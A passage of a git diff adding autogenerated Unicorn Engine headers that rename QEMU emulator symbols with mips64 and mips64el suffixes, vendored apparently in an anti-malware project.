helper_muleq_s_pw_qhr helper_muleq_s_pw_qhr_mips64 +#define helper_mulsaq_s_w_qh helper_mulsaq_s_w_qh_mips64 +#define helper_dpau_h_obl helper_dpau_h_obl_mips64 +#define helper_dpau_h_obr helper_dpau_h_obr_mips64 +#define helper_dpsu_h_obl helper_dpsu_h_obl_mips64 +#define helper_dpsu_h_obr helper_dpsu_h_obr_mips64 +#define helper_dpa_w_qh helper_dpa_w_qh_mips64 +#define helper_dpaq_s_w_qh helper_dpaq_s_w_qh_mips64 +#define helper_dps_w_qh helper_dps_w_qh_mips64 +#define helper_dpsq_s_w_qh helper_dpsq_s_w_qh_mips64 +#define helper_dpaq_sa_l_pw helper_dpaq_sa_l_pw_mips64 +#define helper_dpsq_sa_l_pw helper_dpsq_sa_l_pw_mips64 +#define helper_mulsaq_s_l_pw helper_mulsaq_s_l_pw_mips64 +#define helper_maq_s_w_qhll helper_maq_s_w_qhll_mips64 +#define helper_maq_s_w_qhlr helper_maq_s_w_qhlr_mips64 +#define helper_maq_s_w_qhrl helper_maq_s_w_qhrl_mips64 +#define helper_maq_s_w_qhrr helper_maq_s_w_qhrr_mips64 +#define helper_maq_sa_w_qhll helper_maq_sa_w_qhll_mips64 +#define helper_maq_sa_w_qhlr helper_maq_sa_w_qhlr_mips64 +#define helper_maq_sa_w_qhrl helper_maq_sa_w_qhrl_mips64 +#define helper_maq_sa_w_qhrr helper_maq_sa_w_qhrr_mips64 +#define helper_maq_s_l_pwl helper_maq_s_l_pwl_mips64 +#define helper_maq_s_l_pwr helper_maq_s_l_pwr_mips64 +#define helper_dmadd helper_dmadd_mips64 +#define helper_dmaddu helper_dmaddu_mips64 +#define helper_dmsub helper_dmsub_mips64 +#define helper_dmsubu helper_dmsubu_mips64 +#define helper_dinsv helper_dinsv_mips64 +#define helper_cmpgu_eq_ob helper_cmpgu_eq_ob_mips64 +#define helper_cmpgu_lt_ob helper_cmpgu_lt_ob_mips64 +#define helper_cmpgu_le_ob helper_cmpgu_le_ob_mips64 +#define helper_cmpu_eq_ob helper_cmpu_eq_ob_mips64 +#define helper_cmpu_lt_ob helper_cmpu_lt_ob_mips64 +#define helper_cmpu_le_ob helper_cmpu_le_ob_mips64 +#define helper_cmp_eq_qh helper_cmp_eq_qh_mips64 +#define helper_cmp_lt_qh helper_cmp_lt_qh_mips64 +#define helper_cmp_le_qh helper_cmp_le_qh_mips64 +#define helper_cmp_eq_pw helper_cmp_eq_pw_mips64 +#define helper_cmp_lt_pw helper_cmp_lt_pw_mips64 +#define helper_cmp_le_pw helper_cmp_le_pw_mips64 +#define helper_cmpgdu_eq_ob helper_cmpgdu_eq_ob_mips64 +#define helper_cmpgdu_lt_ob helper_cmpgdu_lt_ob_mips64 +#define helper_cmpgdu_le_ob helper_cmpgdu_le_ob_mips64 +#define helper_pick_ob helper_pick_ob_mips64 +#define helper_pick_qh helper_pick_qh_mips64 +#define helper_pick_pw helper_pick_pw_mips64 +#define helper_packrl_pw helper_packrl_pw_mips64 +#define helper_dextr_w helper_dextr_w_mips64 +#define helper_dextr_r_w helper_dextr_r_w_mips64 +#define helper_dextr_rs_w helper_dextr_rs_w_mips64 +#define helper_dextr_l helper_dextr_l_mips64 +#define helper_dextr_r_l helper_dextr_r_l_mips64 +#define helper_dextr_rs_l helper_dextr_rs_l_mips64 +#define helper_dextr_s_h helper_dextr_s_h_mips64 +#define helper_dextp helper_dextp_mips64 +#define helper_dextpdp helper_dextpdp_mips64 +#define helper_dshilo helper_dshilo_mips64 +#define helper_dmthlip helper_dmthlip_mips64 +#define helper_dclo helper_dclo_mips64 +#define helper_dclz helper_dclz_mips64 +#define helper_dbitswap helper_dbitswap_mips64 +#define helper_lld helper_lld_mips64 +#define helper_scd helper_scd_mips64 +#define helper_sdl helper_sdl_mips64 +#define helper_sdr helper_sdr_mips64 +#define helper_ldm helper_ldm_mips64 +#define helper_sdm helper_sdm_mips64 +#define helper_dmfc0_tcrestart helper_dmfc0_tcrestart_mips64 +#define helper_dmfc0_tchalt helper_dmfc0_tchalt_mips64 +#define helper_dmfc0_tccontext helper_dmfc0_tccontext_mips64 +#define helper_dmfc0_tcschedule helper_dmfc0_tcschedule_mips64 +#define helper_dmfc0_tcschefback helper_dmfc0_tcschefback_mips64 +#define helper_dmfc0_lladdr helper_dmfc0_lladdr_mips64 +#define helper_dmfc0_watchlo helper_dmfc0_watchlo_mips64 +#define helper_dmtc0_entrylo0 helper_dmtc0_entrylo0_mips64 +#define helper_dmtc0_entrylo1 helper_dmtc0_entrylo1_mips64 +#define mips_reg_reset mips_reg_reset_mips64 +#define mips_reg_read mips_reg_read_mips64 +#define mips_reg_write mips_reg_write_mips64 +#define mips_tcg_init mips_tcg_init_mips64 +#define mips_cpu_list mips_cpu_list_mips64 +#define mips_release mips_release_mips64 +#define MIPS64_REGS_STORAGE_SIZE MIPS64_REGS_STORAGE_SIZE_mips64 +#define MIPS_REGS_STORAGE_SIZE MIPS_REGS_STORAGE_SIZE_mips64 +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/mips64el.h b/ai_anti_malware/unicorn/unicorn-master/qemu/mips64el.h new file mode 100644 index 0000000..afe0d47 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/mips64el.h @@ -0,0 +1,3928 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_MIPS64EL_H +#define UNICORN_AUTOGEN_MIPS64EL_H +#define arm_release arm_release_mips64el +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_mips64el +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_mips64el +#define use_idiv_instructions_rt use_idiv_instructions_rt_mips64el +#define tcg_target_deposit_valid tcg_target_deposit_valid_mips64el +#define helper_power_down helper_power_down_mips64el +#define check_exit_request check_exit_request_mips64el +#define address_space_unregister address_space_unregister_mips64el +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_mips64el +#define phys_mem_clean phys_mem_clean_mips64el +#define tb_cleanup tb_cleanup_mips64el +#define memory_map memory_map_mips64el +#define memory_map_ptr memory_map_ptr_mips64el +#define memory_unmap memory_unmap_mips64el +#define memory_free memory_free_mips64el +#define free_code_gen_buffer free_code_gen_buffer_mips64el +#define helper_raise_exception helper_raise_exception_mips64el +#define tcg_enabled tcg_enabled_mips64el +#define tcg_exec_init tcg_exec_init_mips64el +#define memory_register_types memory_register_types_mips64el +#define cpu_exec_init_all cpu_exec_init_all_mips64el +#define vm_start vm_start_mips64el +#define resume_all_vcpus resume_all_vcpus_mips64el +#define a15_l2ctlr_read a15_l2ctlr_read_mips64el +#define a64_translate_init a64_translate_init_mips64el +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_mips64el +#define aa64_cacheop_access aa64_cacheop_access_mips64el +#define aa64_daif_access aa64_daif_access_mips64el +#define aa64_daif_write aa64_daif_write_mips64el +#define aa64_dczid_read aa64_dczid_read_mips64el +#define aa64_fpcr_read aa64_fpcr_read_mips64el +#define aa64_fpcr_write aa64_fpcr_write_mips64el +#define aa64_fpsr_read aa64_fpsr_read_mips64el +#define aa64_fpsr_write aa64_fpsr_write_mips64el +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_mips64el +#define aa64_zva_access aa64_zva_access_mips64el +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_mips64el +#define aarch64_restore_sp aarch64_restore_sp_mips64el +#define aarch64_save_sp aarch64_save_sp_mips64el +#define accel_find accel_find_mips64el +#define accel_init_machine accel_init_machine_mips64el +#define accel_type accel_type_mips64el +#define access_with_adjusted_size access_with_adjusted_size_mips64el +#define add128 add128_mips64el +#define add16_sat add16_sat_mips64el +#define add16_usat add16_usat_mips64el +#define add192 add192_mips64el +#define add8_sat add8_sat_mips64el +#define add8_usat add8_usat_mips64el +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_mips64el +#define add_cpreg_to_list add_cpreg_to_list_mips64el +#define addFloat128Sigs addFloat128Sigs_mips64el +#define addFloat32Sigs addFloat32Sigs_mips64el +#define addFloat64Sigs addFloat64Sigs_mips64el +#define addFloatx80Sigs addFloatx80Sigs_mips64el +#define add_qemu_ldst_label add_qemu_ldst_label_mips64el +#define address_space_access_valid address_space_access_valid_mips64el +#define address_space_destroy address_space_destroy_mips64el +#define address_space_destroy_dispatch address_space_destroy_dispatch_mips64el +#define address_space_get_flatview address_space_get_flatview_mips64el +#define address_space_init address_space_init_mips64el +#define address_space_init_dispatch address_space_init_dispatch_mips64el +#define address_space_lookup_region address_space_lookup_region_mips64el +#define address_space_map address_space_map_mips64el +#define address_space_read address_space_read_mips64el +#define address_space_rw address_space_rw_mips64el +#define address_space_translate address_space_translate_mips64el +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_mips64el +#define address_space_translate_internal address_space_translate_internal_mips64el +#define address_space_unmap address_space_unmap_mips64el +#define address_space_update_topology address_space_update_topology_mips64el +#define address_space_update_topology_pass address_space_update_topology_pass_mips64el +#define address_space_write address_space_write_mips64el +#define addrrange_contains addrrange_contains_mips64el +#define addrrange_end addrrange_end_mips64el +#define addrrange_equal addrrange_equal_mips64el +#define addrrange_intersection addrrange_intersection_mips64el +#define addrrange_intersects addrrange_intersects_mips64el +#define addrrange_make addrrange_make_mips64el +#define adjust_endianness adjust_endianness_mips64el +#define all_helpers all_helpers_mips64el +#define alloc_code_gen_buffer alloc_code_gen_buffer_mips64el +#define alloc_entry alloc_entry_mips64el +#define always_true always_true_mips64el +#define arm1026_initfn arm1026_initfn_mips64el +#define arm1136_initfn arm1136_initfn_mips64el +#define arm1136_r2_initfn arm1136_r2_initfn_mips64el +#define arm1176_initfn arm1176_initfn_mips64el +#define arm11mpcore_initfn arm11mpcore_initfn_mips64el +#define arm926_initfn arm926_initfn_mips64el +#define arm946_initfn arm946_initfn_mips64el +#define arm_ccnt_enabled arm_ccnt_enabled_mips64el +#define arm_cp_read_zero arm_cp_read_zero_mips64el +#define arm_cp_reset_ignore arm_cp_reset_ignore_mips64el +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_mips64el +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_mips64el +#define arm_cpu_finalizefn arm_cpu_finalizefn_mips64el +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_mips64el +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_mips64el +#define arm_cpu_initfn arm_cpu_initfn_mips64el +#define arm_cpu_list arm_cpu_list_mips64el +#define cpu_loop_exit cpu_loop_exit_mips64el +#define arm_cpu_post_init arm_cpu_post_init_mips64el +#define arm_cpu_realizefn arm_cpu_realizefn_mips64el +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_mips64el +#define arm_cpu_register_types arm_cpu_register_types_mips64el +#define cpu_resume_from_signal cpu_resume_from_signal_mips64el +#define arm_cpus arm_cpus_mips64el +#define arm_cpu_set_pc arm_cpu_set_pc_mips64el +#define arm_cp_write_ignore arm_cp_write_ignore_mips64el +#define arm_current_el arm_current_el_mips64el +#define arm_dc_feature arm_dc_feature_mips64el +#define arm_debug_excp_handler arm_debug_excp_handler_mips64el +#define arm_debug_target_el arm_debug_target_el_mips64el +#define arm_el_is_aa64 arm_el_is_aa64_mips64el +#define arm_env_get_cpu arm_env_get_cpu_mips64el +#define arm_excp_target_el arm_excp_target_el_mips64el +#define arm_excp_unmasked arm_excp_unmasked_mips64el +#define arm_feature arm_feature_mips64el +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_mips64el +#define gen_intermediate_code gen_intermediate_code_mips64el +#define gen_intermediate_code_pc gen_intermediate_code_pc_mips64el +#define arm_gen_test_cc arm_gen_test_cc_mips64el +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_mips64el +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_mips64el +#define arm_handle_psci_call arm_handle_psci_call_mips64el +#define arm_is_psci_call arm_is_psci_call_mips64el +#define arm_is_secure arm_is_secure_mips64el +#define arm_is_secure_below_el3 arm_is_secure_below_el3_mips64el +#define arm_ldl_code arm_ldl_code_mips64el +#define arm_lduw_code arm_lduw_code_mips64el +#define arm_log_exception arm_log_exception_mips64el +#define arm_reg_read arm_reg_read_mips64el +#define arm_reg_reset arm_reg_reset_mips64el +#define arm_reg_write arm_reg_write_mips64el +#define restore_state_to_opc restore_state_to_opc_mips64el +#define arm_rmode_to_sf arm_rmode_to_sf_mips64el +#define arm_singlestep_active arm_singlestep_active_mips64el +#define tlb_fill tlb_fill_mips64el +#define tlb_flush tlb_flush_mips64el +#define tlb_flush_page tlb_flush_page_mips64el +#define tlb_set_page tlb_set_page_mips64el +#define arm_translate_init arm_translate_init_mips64el +#define arm_v7m_class_init arm_v7m_class_init_mips64el +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_mips64el +#define ats_access ats_access_mips64el +#define ats_write ats_write_mips64el +#define bad_mode_switch bad_mode_switch_mips64el +#define bank_number bank_number_mips64el +#define bitmap_zero_extend bitmap_zero_extend_mips64el +#define bp_wp_matches bp_wp_matches_mips64el +#define breakpoint_invalidate breakpoint_invalidate_mips64el +#define build_page_bitmap build_page_bitmap_mips64el +#define bus_add_child bus_add_child_mips64el +#define bus_class_init bus_class_init_mips64el +#define bus_info bus_info_mips64el +#define bus_unparent bus_unparent_mips64el +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_mips64el +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_mips64el +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_mips64el +#define call_recip_estimate call_recip_estimate_mips64el +#define can_merge can_merge_mips64el +#define capacity_increase capacity_increase_mips64el +#define ccsidr_read ccsidr_read_mips64el +#define check_ap check_ap_mips64el +#define check_breakpoints check_breakpoints_mips64el +#define check_watchpoints check_watchpoints_mips64el +#define cho cho_mips64el +#define clear_bit clear_bit_mips64el +#define clz32 clz32_mips64el +#define clz64 clz64_mips64el +#define cmp_flatrange_addr cmp_flatrange_addr_mips64el +#define code_gen_alloc code_gen_alloc_mips64el +#define commonNaNToFloat128 commonNaNToFloat128_mips64el +#define commonNaNToFloat16 commonNaNToFloat16_mips64el +#define commonNaNToFloat32 commonNaNToFloat32_mips64el +#define commonNaNToFloat64 commonNaNToFloat64_mips64el +#define commonNaNToFloatx80 commonNaNToFloatx80_mips64el +#define compute_abs_deadline compute_abs_deadline_mips64el +#define cond_name cond_name_mips64el +#define configure_accelerator configure_accelerator_mips64el +#define container_get container_get_mips64el +#define container_info container_info_mips64el +#define container_register_types container_register_types_mips64el +#define contextidr_write contextidr_write_mips64el +#define core_log_global_start core_log_global_start_mips64el +#define core_log_global_stop core_log_global_stop_mips64el +#define core_memory_listener core_memory_listener_mips64el +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_mips64el +#define cortex_a15_initfn cortex_a15_initfn_mips64el +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_mips64el +#define cortex_a8_initfn cortex_a8_initfn_mips64el +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_mips64el +#define cortex_a9_initfn cortex_a9_initfn_mips64el +#define cortex_m3_initfn cortex_m3_initfn_mips64el +#define count_cpreg count_cpreg_mips64el +#define countLeadingZeros32 countLeadingZeros32_mips64el +#define countLeadingZeros64 countLeadingZeros64_mips64el +#define cp_access_ok cp_access_ok_mips64el +#define cpacr_write cpacr_write_mips64el +#define cpreg_field_is_64bit cpreg_field_is_64bit_mips64el +#define cp_reginfo cp_reginfo_mips64el +#define cpreg_key_compare cpreg_key_compare_mips64el +#define cpreg_make_keylist cpreg_make_keylist_mips64el +#define cp_reg_reset cp_reg_reset_mips64el +#define cpreg_to_kvm_id cpreg_to_kvm_id_mips64el +#define cpsr_read cpsr_read_mips64el +#define cpsr_write cpsr_write_mips64el +#define cptype_valid cptype_valid_mips64el +#define cpu_abort cpu_abort_mips64el +#define cpu_arm_exec cpu_arm_exec_mips64el +#define cpu_arm_gen_code cpu_arm_gen_code_mips64el +#define cpu_arm_init cpu_arm_init_mips64el +#define cpu_breakpoint_insert cpu_breakpoint_insert_mips64el +#define cpu_breakpoint_remove cpu_breakpoint_remove_mips64el +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_mips64el +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_mips64el +#define cpu_can_do_io cpu_can_do_io_mips64el +#define cpu_can_run cpu_can_run_mips64el +#define cpu_class_init cpu_class_init_mips64el +#define cpu_common_class_by_name cpu_common_class_by_name_mips64el +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_mips64el +#define cpu_common_get_arch_id cpu_common_get_arch_id_mips64el +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_mips64el +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_mips64el +#define cpu_common_has_work cpu_common_has_work_mips64el +#define cpu_common_initfn cpu_common_initfn_mips64el +#define cpu_common_noop cpu_common_noop_mips64el +#define cpu_common_parse_features cpu_common_parse_features_mips64el +#define cpu_common_realizefn cpu_common_realizefn_mips64el +#define cpu_common_reset cpu_common_reset_mips64el +#define cpu_dump_statistics cpu_dump_statistics_mips64el +#define cpu_exec_init cpu_exec_init_mips64el +#define cpu_flush_icache_range cpu_flush_icache_range_mips64el +#define cpu_gen_init cpu_gen_init_mips64el +#define cpu_get_clock cpu_get_clock_mips64el +#define cpu_get_real_ticks cpu_get_real_ticks_mips64el +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_mips64el +#define cpu_handle_debug_exception cpu_handle_debug_exception_mips64el +#define cpu_handle_guest_debug cpu_handle_guest_debug_mips64el +#define cpu_inb cpu_inb_mips64el +#define cpu_inl cpu_inl_mips64el +#define cpu_interrupt cpu_interrupt_mips64el +#define cpu_interrupt_handler cpu_interrupt_handler_mips64el +#define cpu_inw cpu_inw_mips64el +#define cpu_io_recompile cpu_io_recompile_mips64el +#define cpu_is_stopped cpu_is_stopped_mips64el +#define cpu_ldl_code cpu_ldl_code_mips64el +#define cpu_ldub_code cpu_ldub_code_mips64el +#define cpu_lduw_code cpu_lduw_code_mips64el +#define cpu_memory_rw_debug cpu_memory_rw_debug_mips64el +#define cpu_mmu_index cpu_mmu_index_mips64el +#define cpu_outb cpu_outb_mips64el +#define cpu_outl cpu_outl_mips64el +#define cpu_outw cpu_outw_mips64el +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_mips64el +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_mips64el +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_mips64el +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_mips64el +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_mips64el +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_mips64el +#define cpu_physical_memory_map cpu_physical_memory_map_mips64el +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_mips64el +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_mips64el +#define cpu_physical_memory_rw cpu_physical_memory_rw_mips64el +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_mips64el +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_mips64el +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_mips64el +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_mips64el +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_mips64el +#define cpu_register cpu_register_mips64el +#define cpu_register_types cpu_register_types_mips64el +#define cpu_restore_state cpu_restore_state_mips64el +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_mips64el +#define cpu_single_step cpu_single_step_mips64el +#define cpu_tb_exec cpu_tb_exec_mips64el +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_mips64el +#define cpu_to_be64 cpu_to_be64_mips64el +#define cpu_to_le32 cpu_to_le32_mips64el +#define cpu_to_le64 cpu_to_le64_mips64el +#define cpu_type_info cpu_type_info_mips64el +#define cpu_unassigned_access cpu_unassigned_access_mips64el +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_mips64el +#define cpu_watchpoint_insert cpu_watchpoint_insert_mips64el +#define cpu_watchpoint_remove cpu_watchpoint_remove_mips64el +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_mips64el +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_mips64el +#define crc32c_table crc32c_table_mips64el +#define create_new_memory_mapping create_new_memory_mapping_mips64el +#define csselr_write csselr_write_mips64el +#define cto32 cto32_mips64el +#define ctr_el0_access ctr_el0_access_mips64el +#define ctz32 ctz32_mips64el +#define ctz64 ctz64_mips64el +#define dacr_write dacr_write_mips64el +#define dbgbcr_write dbgbcr_write_mips64el +#define dbgbvr_write dbgbvr_write_mips64el +#define dbgwcr_write dbgwcr_write_mips64el +#define dbgwvr_write dbgwvr_write_mips64el +#define debug_cp_reginfo debug_cp_reginfo_mips64el +#define debug_frame debug_frame_mips64el +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_mips64el +#define define_arm_cp_regs define_arm_cp_regs_mips64el +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_mips64el +#define define_debug_regs define_debug_regs_mips64el +#define define_one_arm_cp_reg define_one_arm_cp_reg_mips64el +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_mips64el +#define deposit32 deposit32_mips64el +#define deposit64 deposit64_mips64el +#define deregister_tm_clones deregister_tm_clones_mips64el +#define device_class_base_init device_class_base_init_mips64el +#define device_class_init device_class_init_mips64el +#define device_finalize device_finalize_mips64el +#define device_get_realized device_get_realized_mips64el +#define device_initfn device_initfn_mips64el +#define device_post_init device_post_init_mips64el +#define device_reset device_reset_mips64el +#define device_set_realized device_set_realized_mips64el +#define device_type_info device_type_info_mips64el +#define disas_arm_insn disas_arm_insn_mips64el +#define disas_coproc_insn disas_coproc_insn_mips64el +#define disas_dsp_insn disas_dsp_insn_mips64el +#define disas_iwmmxt_insn disas_iwmmxt_insn_mips64el +#define disas_neon_data_insn disas_neon_data_insn_mips64el +#define disas_neon_ls_insn disas_neon_ls_insn_mips64el +#define disas_thumb2_insn disas_thumb2_insn_mips64el +#define disas_thumb_insn disas_thumb_insn_mips64el +#define disas_vfp_insn disas_vfp_insn_mips64el +#define disas_vfp_v8_insn disas_vfp_v8_insn_mips64el +#define do_arm_semihosting do_arm_semihosting_mips64el +#define do_clz16 do_clz16_mips64el +#define do_clz8 do_clz8_mips64el +#define do_constant_folding do_constant_folding_mips64el +#define do_constant_folding_2 do_constant_folding_2_mips64el +#define do_constant_folding_cond do_constant_folding_cond_mips64el +#define do_constant_folding_cond2 do_constant_folding_cond2_mips64el +#define do_constant_folding_cond_32 do_constant_folding_cond_32_mips64el +#define do_constant_folding_cond_64 do_constant_folding_cond_64_mips64el +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_mips64el +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_mips64el +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_mips64el +#define do_ssat do_ssat_mips64el +#define do_usad do_usad_mips64el +#define do_usat do_usat_mips64el +#define do_v7m_exception_exit do_v7m_exception_exit_mips64el +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_mips64el +#define dummy_func dummy_func_mips64el +#define dummy_section dummy_section_mips64el +#define _DYNAMIC _DYNAMIC_mips64el +#define _edata _edata_mips64el +#define _end _end_mips64el +#define end_list end_list_mips64el +#define eq128 eq128_mips64el +#define ErrorClass_lookup ErrorClass_lookup_mips64el +#define error_copy error_copy_mips64el +#define error_exit error_exit_mips64el +#define error_get_class error_get_class_mips64el +#define error_get_pretty error_get_pretty_mips64el +#define error_setg_file_open error_setg_file_open_mips64el +#define estimateDiv128To64 estimateDiv128To64_mips64el +#define estimateSqrt32 estimateSqrt32_mips64el +#define excnames excnames_mips64el +#define excp_is_internal excp_is_internal_mips64el +#define extended_addresses_enabled extended_addresses_enabled_mips64el +#define extended_mpu_ap_bits extended_mpu_ap_bits_mips64el +#define extract32 extract32_mips64el +#define extract64 extract64_mips64el +#define extractFloat128Exp extractFloat128Exp_mips64el +#define extractFloat128Frac0 extractFloat128Frac0_mips64el +#define extractFloat128Frac1 extractFloat128Frac1_mips64el +#define extractFloat128Sign extractFloat128Sign_mips64el +#define extractFloat16Exp extractFloat16Exp_mips64el +#define extractFloat16Frac extractFloat16Frac_mips64el +#define extractFloat16Sign extractFloat16Sign_mips64el +#define extractFloat32Exp extractFloat32Exp_mips64el +#define extractFloat32Frac extractFloat32Frac_mips64el +#define extractFloat32Sign extractFloat32Sign_mips64el +#define extractFloat64Exp extractFloat64Exp_mips64el +#define extractFloat64Frac extractFloat64Frac_mips64el +#define extractFloat64Sign extractFloat64Sign_mips64el +#define extractFloatx80Exp extractFloatx80Exp_mips64el +#define extractFloatx80Frac extractFloatx80Frac_mips64el +#define extractFloatx80Sign extractFloatx80Sign_mips64el +#define fcse_write fcse_write_mips64el +#define find_better_copy find_better_copy_mips64el +#define find_default_machine find_default_machine_mips64el +#define find_desc_by_name find_desc_by_name_mips64el +#define find_first_bit find_first_bit_mips64el +#define find_paging_enabled_cpu find_paging_enabled_cpu_mips64el +#define find_ram_block find_ram_block_mips64el +#define find_ram_offset find_ram_offset_mips64el +#define find_string find_string_mips64el +#define find_type find_type_mips64el +#define _fini _fini_mips64el +#define flatrange_equal flatrange_equal_mips64el +#define flatview_destroy flatview_destroy_mips64el +#define flatview_init flatview_init_mips64el +#define flatview_insert flatview_insert_mips64el +#define flatview_lookup flatview_lookup_mips64el +#define flatview_ref flatview_ref_mips64el +#define flatview_simplify flatview_simplify_mips64el +#define flatview_unref flatview_unref_mips64el +#define float128_add float128_add_mips64el +#define float128_compare float128_compare_mips64el +#define float128_compare_internal float128_compare_internal_mips64el +#define float128_compare_quiet float128_compare_quiet_mips64el +#define float128_default_nan float128_default_nan_mips64el +#define float128_div float128_div_mips64el +#define float128_eq float128_eq_mips64el +#define float128_eq_quiet float128_eq_quiet_mips64el +#define float128_is_quiet_nan float128_is_quiet_nan_mips64el +#define float128_is_signaling_nan float128_is_signaling_nan_mips64el +#define float128_le float128_le_mips64el +#define float128_le_quiet float128_le_quiet_mips64el +#define float128_lt float128_lt_mips64el +#define float128_lt_quiet float128_lt_quiet_mips64el +#define float128_maybe_silence_nan float128_maybe_silence_nan_mips64el +#define float128_mul float128_mul_mips64el +#define float128_rem float128_rem_mips64el +#define float128_round_to_int float128_round_to_int_mips64el +#define float128_scalbn float128_scalbn_mips64el +#define float128_sqrt float128_sqrt_mips64el +#define float128_sub float128_sub_mips64el +#define float128ToCommonNaN float128ToCommonNaN_mips64el +#define float128_to_float32 float128_to_float32_mips64el +#define float128_to_float64 float128_to_float64_mips64el +#define float128_to_floatx80 float128_to_floatx80_mips64el +#define float128_to_int32 float128_to_int32_mips64el +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_mips64el +#define float128_to_int64 float128_to_int64_mips64el +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_mips64el +#define float128_unordered float128_unordered_mips64el +#define float128_unordered_quiet float128_unordered_quiet_mips64el +#define float16_default_nan float16_default_nan_mips64el +#define float16_is_quiet_nan float16_is_quiet_nan_mips64el +#define float16_is_signaling_nan float16_is_signaling_nan_mips64el +#define float16_maybe_silence_nan float16_maybe_silence_nan_mips64el +#define float16ToCommonNaN float16ToCommonNaN_mips64el +#define float16_to_float32 float16_to_float32_mips64el +#define float16_to_float64 float16_to_float64_mips64el +#define float32_abs float32_abs_mips64el +#define float32_add float32_add_mips64el +#define float32_chs float32_chs_mips64el +#define float32_compare float32_compare_mips64el +#define float32_compare_internal float32_compare_internal_mips64el +#define float32_compare_quiet float32_compare_quiet_mips64el +#define float32_default_nan float32_default_nan_mips64el +#define float32_div float32_div_mips64el +#define float32_eq float32_eq_mips64el +#define float32_eq_quiet float32_eq_quiet_mips64el +#define float32_exp2 float32_exp2_mips64el +#define float32_exp2_coefficients float32_exp2_coefficients_mips64el +#define float32_is_any_nan float32_is_any_nan_mips64el +#define float32_is_infinity float32_is_infinity_mips64el +#define float32_is_neg float32_is_neg_mips64el +#define float32_is_quiet_nan float32_is_quiet_nan_mips64el +#define float32_is_signaling_nan float32_is_signaling_nan_mips64el +#define float32_is_zero float32_is_zero_mips64el +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_mips64el +#define float32_le float32_le_mips64el +#define float32_le_quiet float32_le_quiet_mips64el +#define float32_log2 float32_log2_mips64el +#define float32_lt float32_lt_mips64el +#define float32_lt_quiet float32_lt_quiet_mips64el +#define float32_max float32_max_mips64el +#define float32_maxnum float32_maxnum_mips64el +#define float32_maxnummag float32_maxnummag_mips64el +#define float32_maybe_silence_nan float32_maybe_silence_nan_mips64el +#define float32_min float32_min_mips64el +#define float32_minmax float32_minmax_mips64el +#define float32_minnum float32_minnum_mips64el +#define float32_minnummag float32_minnummag_mips64el +#define float32_mul float32_mul_mips64el +#define float32_muladd float32_muladd_mips64el +#define float32_rem float32_rem_mips64el +#define float32_round_to_int float32_round_to_int_mips64el +#define float32_scalbn float32_scalbn_mips64el +#define float32_set_sign float32_set_sign_mips64el +#define float32_sqrt float32_sqrt_mips64el +#define float32_squash_input_denormal float32_squash_input_denormal_mips64el +#define float32_sub float32_sub_mips64el +#define float32ToCommonNaN float32ToCommonNaN_mips64el +#define float32_to_float128 float32_to_float128_mips64el +#define float32_to_float16 float32_to_float16_mips64el +#define float32_to_float64 float32_to_float64_mips64el +#define float32_to_floatx80 float32_to_floatx80_mips64el +#define float32_to_int16 